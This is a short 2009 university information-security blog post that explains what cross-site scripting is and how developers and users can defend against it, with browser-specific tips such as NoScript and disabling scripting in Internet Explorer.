Internet Storm Center Infocon Status

Search ISU Security

RSSSubscribe to the RSS Feed
ISU Information Security

What is XSS?

Wednesday, July 29, 2009 14:45

XSS or Cross-Site Scripting is an attack on the web browser via web applications. Typically the attack involves code injected into a victim web-site from elsewhere targeting the viewer’s data. As of 2007 cross-site scripting became the most prevelant form of web-based attack.

Cross-site scripting attacks encompass a varitiey of attack types on the user’s browser. The typical goal is to gain access to a user’s personal data stored at the targeted web server.

Web application developers can mitigate against XSS attaccks through code review and staying abreast of known attack vectors through sites like SANS’ Storm Center.

XSS attacks can be defended against by web users by disabling scripting in the web browser and only allowing certain sites to run scripts.

Firefox users can download the NoScript add-on which allows the user to selectivly allow scripting via a whitelist. NoScript also includes an anti-XSS component which remains active even if script blocking is disabled. NoScript can be downloaded through the Firefox add-on tool.

Safari users can purchase PithHelmet, an ad-blocking plugin for Safari which includes script controls.

IE users can disable scripting from the Tools menu:

    In IE 7-8:

  1. From the Tools menu select “Internet Options”.
  2. Click the “Security” tab.
  3. Click “Custom Level”.
  4. Scroll own to the scripting section and choose “Disable”.

A browser restart will be needed.

Enabling and DIsabling Javascript in Web Browsers
Wikipedia – Cross Site Scripting
VirtualForge – How XSS works (flash movies)
The Cross-Site Scripting FAQ